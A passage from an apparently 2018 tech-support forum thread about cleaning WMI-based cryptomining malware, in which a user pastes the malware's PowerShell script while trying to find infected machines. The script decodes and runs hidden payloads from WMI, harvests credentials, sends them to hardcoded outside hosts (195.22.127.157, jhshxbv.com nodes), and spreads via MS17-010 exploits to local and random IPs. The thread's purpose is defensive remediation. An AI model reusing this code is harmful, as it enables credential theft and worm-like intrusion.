     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __FilterToConsumerBinding WHERE “Filter=””__EventFilter.Name=’DSM Event Log Filter’””” DELETE
    }

    The class name, filename or variables used in your environment might be different. Just modify the script. If you need more information, check out my article on medium

    https://medium.com/@christoferdirk/cryptomining-malware-is-using-wmi-to-evade-antivirus-detection-248a91a620b9

    I'll check it out.

    I just wanted to identify the computer that is infected.

    $stime=[Environment]::TickCount
    $funs = ([WmiClass] 'root\default:Win32_Services').Properties['funs'].Value
    $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
    iex $defun

    Get-WmiObject _FilterToConsumerBinding -Namespace root\subscription | Where-Object {$.filter -notmatch 'DSM Event'} |Remove-WmiObject
    $dirpath=$env:SystemRoot+'\system32'
    if  (!(test-path $dirpath )){
            $dirpath=$env:SystemRoot
    }
    if (!(test-path ($dirpath+'\msvcp120.dll')))
    {sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
    if (!(test-path ($dirpath+'\msvcr120.dll')))
    {sentfile ($dirpath+'\msvcr120.dll') 'vcr'}

    [array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
    $tcpconn = netstat -anop tcp
    $exist=$False
    if ($psids -ne $null )
    {
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if ($line -eq $null)
            {continue}
            if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
            {
                $exist=$true
                break
            }
        }
    }
    foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){continue}
            if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")-or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
            {
                $evid=$line[-1]
                Get-Process -id $evid | stop-process -force
            }
        }
    if (!$exist -and ($psids.count -le 8))
    {
        $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Win32_Services').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:Win32_Services').Proper
    ties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon
    , `$mon, 'Void', 0, '', '')`""
        $vbs = New-Object -ComObject WScript.Shell
        $vbs.run($cmdmon,0)
    }

    $NTLM=$False
    $mimi = ([WmiClass] 'root\default:Win32_Services').Properties['mimi'].Value
    $a, $NTLM= Get-creds $mimi $mimi
    $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
    $ipsu = ([WmiClass] 'root\default:Win32_Services').Properties['ipsu'].Value
    $i17 = ([WmiClass] 'root\default:Win32_Services').Properties['i17'].Value
    $scba= ([WmiClass] 'root\default:Win32_Services').Properties['sc'].Value
    [byte[]]$sc=[System.Convert]::FromBase64String($scba)

    $se=@('195.22.127.157', 'node.jhshxbv.com', 'node2.jhshxbv.com', 'node3.jhshxbv.com', 'node4.jhshxbv.com')
    $nic='195.22.127.157'
    foreach($t in $se)
    {
            $pin=test-connection $t
            if ($pin -ne $null)
            {
                    $nic=$t
                    break
            }
    }
    $nic=$nic+":8000"
    if ($a.count -ne 0)
    {
    foreach($aa in $a){
    $data = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aa))
    (New-Object Net.WebClient).DownloadString("http://$nic/api.php?data=" + $data)
    }
    }
    foreach ($Network in $Networks)
    {

        $IPAddress  = $Network.IpAddress[0]
        if ($IPAddress -match '^169.254')
        {
            continue
        }
        $SubnetMask  = $Network.IPSubnet[0]
        $ips=Get-NetworkRange $IPAddress $SubnetMask
        $tcpconn = netstat -anop tcp
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){
                continue
            }
            if ($line.count -le 4){
                continue
            }
            $i=$line[-3].split(':')[0]
            if (($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
            {
                $ips+=$i
            }
        }
        if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        foreach ($ip in $ips)
        {
            if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
            if ($ip -eq $IPAddress){continue}
            if ((Test-Connection $ip -count 1) -ne $null  -and $ipsu -notcontains $ip)
            {
                $re=0
                if ($a.count -ne 0)
                {
                    $re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM
                }
                if ($re -eq 1)
                {
                    $ipsu = $ipsu + " " + $ip
                }
                else
                {
                    $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                    if ($vul -and $i17 -notcontains $ip)
                    {
                        $res = eb7 $ip $sc
                        if ($res -ne $true)
                        {
                            eb8 $ip $sc
                        }
                        $i17 = $i17 + " " + $ip
                    }
                }
            }
        }
     }
    $StaticClass=New-Object Management.ManagementClass('root\default:Win32_Services')
    $StaticClass.SetPropertyValue('ipsu' ,$ipsu)
    $StaticClass.Put()
    $StaticClass.SetPropertyValue('i17' ,$i17)
    $StaticClass.Put()

    $t=test-connection 9.9.9.9 -Verbose -Count 2
    if($t){
        [System.Threading.Mutex]$thread_mutex;
    [bool]$result = $false;
    $thread_mutex = New-Object System.Threading.Mutex($true, "MMLOLSacnner", [ref] $result);
    if(!$result){
    exit;
    }
    while($true){
    $ip=[IPAddress]::Parse([String] (Get-Random)).IPAddressToString
    $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
    if ($vul)
    {
    $res = eb7 $ip $sc
    if ($res -ne $true)
    {
    eb8 $ip $sc
    }
    }
    Start-Sleep 5
    }
    }

    What should I tailor your script?
    must powershell be enabled on all computers?
    Friday, March 30, 2018 12:31 PM